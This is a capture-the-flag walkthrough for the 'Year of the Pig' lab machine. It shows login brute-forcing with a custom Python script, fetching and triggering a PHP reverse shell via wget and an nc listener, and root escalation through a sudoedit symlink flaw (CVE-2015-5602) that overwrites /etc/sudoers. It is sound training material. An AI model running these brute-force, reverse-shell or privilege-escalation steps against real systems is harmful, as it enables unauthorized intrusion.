4 minutes
Year of the Pig
Machine URL :: Year of the pig
ENUMERATION
Nmap :
nmap -sC -sV -p- 10.10.9.235
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 13:10 IST
Nmap scan report for 10.10.9.235
Host is up (0.057s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Marco's Blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let’s start with the webserver.
data:image/s3,"s3://crabby-images/8fad0/8fad08f3350bea44e81373c8a5370f79af336476" alt="Hello Friend"
Use gobuster for directory bruteforcing:
data:image/s3,"s3://crabby-images/07db1/07db120e941a88d3f27dee0bb7fdc02d607d30ff" alt="Hello Friend"
This reveals the admin directory which yields us this as /login.php
:
data:image/s3,"s3://crabby-images/b3aa0/b3aa0a145a55ada1916d12c72df7952b5322326e" alt="Hello Friend"
Web Login:
The page is sending an AJAX request to /api/login
using JSON format for the user input. Also , the password value is MD5 hash value of the string.
data:image/s3,"s3://crabby-images/f09b4/f09b498496bb4c6faa809f503e84f1a0629d6857" alt="Hello Friend"
For wrong credentials the following message appears:Remember that passwords should be a memorable word, followed by two numbers and a special character
Take a note of that.\
Let’s attempt to bruteforce this login now. We need a custom wordlist as ensured by the password policy. Scanning the page for ‘memorable’ words gives us this:
Marco
marco
plane
planes
airplane
airplanes
airforce
flying
Savoia
savoia
Macchi
macchi
Curtiss
curtiss
milan
Milan
mechanic
maintenance
Italian
italian
Agility
agility
You can use CeWL for this.
Adding a custom rule to /etc/john/john.conf
. This will fulfill the password policy required.
[List.Rules:yop]
Az"[0-9][0-9][!#$%&(),*=/?]"
But the passwords are MD5-Hashed first before being sent to the login. Use this python program to hash the passwords and use them to bruteforce the login:
#!/usr/bin/python3
import requests
import sys
import json
import hashlib
payload= {"username":sys.argv[2],"password":"test"}
i = 0
for line in sys.stdin:
payload["password"] = hashlib.md5(line.rstrip().encode('utf-8')).hexdigest()
r = requests.post(sys.argv[1]+"/api/login",data=json.dumps(payload))
json_data = json.loads(r.content)
i = i +1
if i % 10 == 0:
print(str(i),end="\r")
if json_data["Response"] != "Error":
print (line)
break
Got this from auth.py
This takes a while. Thankfully the password doesn’t seem to reset with every reboot.
data:image/s3,"s3://crabby-images/79457/79457b3f79c59e24e298ab1160808cdb75322130" alt="Hello Friend"
Going forward we see:
data:image/s3,"s3://crabby-images/2ebc0/2ebc0e7dc0c82e551c570ff331be3170b23bfe38" alt="Hello Friend"
Now this is a complete rabbit hole. The commands section only responds to some commands like whoami
which tells us we are www-data
and id
.
FOOTHOLD
SSH as marco using the same password and you get the first flag immediately.
data:image/s3,"s3://crabby-images/2dcad/2dcadc756f1cd02f4226558ed7f97d09522ee3a9" alt="Hello Friend"
Looking in the /var/www
directory to find some hints of what to do with the webserver we find that marco can edit any file here except admin.db
.
data:image/s3,"s3://crabby-images/73180/7318023e7a9f10605682b3315751d628c7b00870" alt="Hello Friend"
To read admin.db
we need to be www-data. So, let’s use our edit access to upload the PentestMonkey PHP reverse shell (located by default on Kali at /usr/share/webshells/php/php-reverse-shell.php
) — making sure to change the IP and port number. \Using wget:
root@kali:/usr/share/webshells/php# python3 -m http.server
marco@year-of-the-pig:/var/www/html/admin$ wget YOUR-IP:8000/php-reverse-shell.php
Start a listener with nc -lvnp <chosen-port>
then activate the shell by going to http://<machine-ip>/php-reverse-shell.php
We can’t read the databse in a non-interactive shell , so to upgrade use :python3 -c 'import pty; pty.spawn("/bin/bash")'
data:image/s3,"s3://crabby-images/c6007/c6007c03a03355bc24be0b937d3d864a711d9c0d" alt="Hello Friend"
We got the password hashes of user curtis.
data:image/s3,"s3://crabby-images/44541/445412e4d5c84590120a8ec9c6a9d93ff4e71f54" alt="Hello Friend"
su curtis
and you’ll get the 2nd flag in his home directory.
PRIVILEGE ESCALATION
Checking sudo -l
we see that Curtis can execute sudoedit as sudo, against some files in /var/www/html.
data:image/s3,"s3://crabby-images/9c6c5/9c6c554aefc87dcfcc0e3d84d72321d1305ac8ca" alt="Hello Friend"
Checking ExploitDB for sudoedit exploit gives us this.
Checking sudo version confirms we are to use the CVE-2015-5602 exploit.
curtis@year-of-the-pig:~$ sudo --version
Sudo version 1.8.13
Sudoers policy plugin version 1.8.13
Sudoers file grammar version 44
Sudoers I/O plugin version 1.8.13
In this version of sudo , sudoedit does not check the full path if a wildcard is used twice (e.g. /html/*/*/config.php
), allowing a malicious user to replace the config.php
real file with a symbolic link to a different location.
Marco being part of the web-developers
can create such a path.
Now symlink this to /etc/sudoers
file so we may give curtis sudo access. You can use this with the /etc/passwd
file to add your own password.
data:image/s3,"s3://crabby-images/6d08b/6d08bf62c2143df60e0fb024d1057fee43ced313" alt="Hello Friend"
Back to Curtis : sudoedit /var/www/html/dir1/dir2/config.php
This did not work with sudo for some reason.
Add curtis to the file :
## User Privilege Specification
##
root ALL=(ALL) ALL
curtis ALL=(ALL) ALL
## Uncomment to allow members of group wheel to execute any command
Now you can use su to elevate your privileges.
data:image/s3,"s3://crabby-images/65f94/65f94cc259c07e4a4c397c7ad90dbfc8a922ba17" alt="Hello Friend"